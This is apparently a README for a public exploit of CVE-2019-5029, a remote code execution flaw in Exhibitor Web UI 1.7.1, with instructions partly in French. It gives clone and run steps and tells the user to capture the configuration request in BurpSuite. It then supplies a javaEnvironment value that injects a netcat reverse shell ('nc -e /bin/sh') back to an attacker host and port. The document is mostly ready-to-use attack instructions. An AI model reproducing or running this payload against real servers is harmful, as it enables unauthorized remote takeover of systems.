
Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029
Exhibitor Web Ui 1.7.1 RCE, CVE-2019-5029
$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/
$ cd Exihibitor-RCE/
Vous devrez peut-être modifier la charge utile de données JSON dans le script. Pour ce faire, capturez simplement la requête à l'aide de BurpSuite lors de l'application des modifications dans l'onglet de configuration d'Exihibitor et copiez-collez-la dans la commande curl du script.
Assurez-vous de modifier le javaEnvironment avec la valeur suivante :
"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"
./exploit.sh <attacker_host> <attacker_port>
Exemple :
$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080
